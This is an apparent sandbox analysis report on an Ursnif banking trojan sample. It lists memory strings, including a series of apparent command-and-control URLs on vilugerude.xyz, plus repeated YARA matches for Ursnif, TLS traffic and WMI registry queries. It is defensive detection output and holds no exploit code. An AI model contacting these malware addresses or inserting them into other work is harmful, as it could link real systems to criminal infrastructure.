Source: {9F80080F-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr, ~DFBDDF96D7C9F8EE76.TMP.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/CW13K5mE2c3xbRAfZePcI/XEak48G8SmMzV00N/TmMgf_2FUC_2FO8/q1mZ7RFRjJFdb0E2U
Source: ~DFF281750E0F709160.TMP.5.dr, {8BC3AC80-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/ISxtPb9NBDRdKdPIDnGulH/UHMvfd9n0X2gt/HgBUH102/d1m0OPwBZ0XynInWe6FU1aI/20
Source: ~DFC13F73B5108036FD.TMP.5.dr, {8BC3AC82-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/ZSXFTmnkcje5EOH/umoJg5Byr3I9szhZzJ/RAjbLNU7_/2BKMDUk3G_2Bo_2FwnsZ/OrQwr5
Source: ~DF5B84FB0897B0685F.TMP.5.dr, {8BC3AC86-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/aOnuW4Kc8kOdYhrgG/HHSmkSFK_2Fd/FqiAyDyS_2B/Bifl3Bed0SdPBr/pMym6LPCFFnLXB
Source: rundll32.exe, 00000003.00000003.1009779943.0000000003034000.00000004.00000001.sdmp, ~DFB72C5D5D1A9C9D82.TMP.5.dr, {9F80080B-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/dFnfMK1xAnp5I7t/YmapWF7tOTYN7Dd_2B/6kHZ1aN0G/zjxUimz2MEw0rWfqLZLJ/gCkKKi
Source: {9F80080D-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/neoLoiiKtwHl6QdM4A/f0O2DxWQo/5EJl2Tz8iA7cOU69VgBA/IeUG6sell9ZjI6yQKow/fY
Source: ~DFD692E6FF3D6732D0.TMP.5.dr, {9F800811-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/qo_2FTJl/jnoEfVMzZHt3_2BMW0xDKGO/M1Kxv2lNpc/7gbEDrc_2F2egCapG/TuTROOPwVO
Source: {92BC32FE-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/t9KapG5Lp7Zt_2Fa57QG/GX7NNpbipoY4mmC8m9o/47gVROA6RCGhiLCLu_2F0K/y86ol3pt
Source: ~DF1901F2BDB9BBEDC1.TMP.5.dr, {9F800809-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/taR_2BUDt4igM2RX/qZ890U_2FvXmpm7/kLlTmzjbCaxzLI30UD/sG2rHuNAE/XyrX_2Fzhy
Source: {8BC3AC84-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/vUdO_2B4IZ3J_2Bd6F3sVbz/0bLr6U_2BT/ty33Mhp8Qlrf5CraM/knAI6s31dF0P/5ITH10
Source: msapplication.xml.5.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.5.dr	String found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.5.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.5.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.5.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.5.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.5.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.5.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.10.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.10.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.10.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24952290&epi=dech
Source: {3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.10.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1619648989&rver
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1619648989&rver=7.0.6730.0&am
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1619648990&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1619648989&rver=7.0.6730.0&w
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: {3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1g9leV.img?h=368&amp
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/en-us?"
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.10.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: {3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/vermischtes/in-z%c3%bcrich-k%c3%b6nnen-sich-nun-auch-personen-
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/%c3%a4rger-%c3%bcber-auto-poser-klagen-%c3%bcber-f
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/alle-sagen-du-siehst-so-gut-aus-doch-der-long-covi
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/cyberkriminalit%c3%a4t-nimmt-zu-so-k%c3%b6nnen-sie
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/so-laut-wie-ein-presslufthammer-auto-poser-rauben-
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/st-galler-regierung-verteidigt-polizeieinsatz-in-r
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/urteil-mit-signalwirkung-unternehmer-erh%c3%a4lt-1
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wie-sich-der-z%c3%bcrcher-kantonsrat-durch-seine-b
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/eine-autoposer-fahrt-war-so-laut-wie-ein-presslufthammer/ar-BB1
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/querulant-k%c3%a4mpft-erfolgreich-gegen-hausverbot/ar-BB1g5LzJ?
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.10.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.10.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.10.dr	String found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49750 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.838142140.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857625114.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909665638.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.959293774.00000000054AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905711954.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905674059.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857795473.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.938999366.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857776316.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905782753.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905833677.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909829429.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857683077.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909904535.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857820386.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857808720.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838200660.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909762591.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857714581.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1009913837.000000000541C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838181374.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909865416.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909891092.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909848147.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838052469.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838002362.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905819560.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909807581.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1013072792.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838240951.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857756795.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838099477.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905803436.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905753199.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.837840447.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905845684.0000000005618000.00000004.00000040.sdmp, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000018.00000003.775701050.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.780693607.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.766624106.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.764888743.0000000002F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.763148290.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.3.loaddll32.exe.bda481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.rundll32.exe.311a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.2e1a481.0.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.838142140.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857625114.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909665638.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.959293774.00000000054AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905711954.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905674059.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857795473.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.938999366.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857776316.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905782753.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905833677.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909829429.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857683077.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909904535.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857820386.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857808720.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838200660.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909762591.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857714581.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1009913837.000000000541C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838181374.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909865416.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909891092.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909848147.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838052469.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838002362.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905819560.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909807581.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1013072792.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838240951.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857756795.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838099477.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905803436.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905753199.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.837840447.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905845684.0000000005618000.00000004.00000040.sdmp, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000018.00000003.775701050.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.780693607.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.766624106.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.764888743.0000000002F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.763148290.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.3.loaddll32.exe.bda481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.rundll32.exe.311a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.2e1a481.0.raw.unpack, type: UNPACKEDPE

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
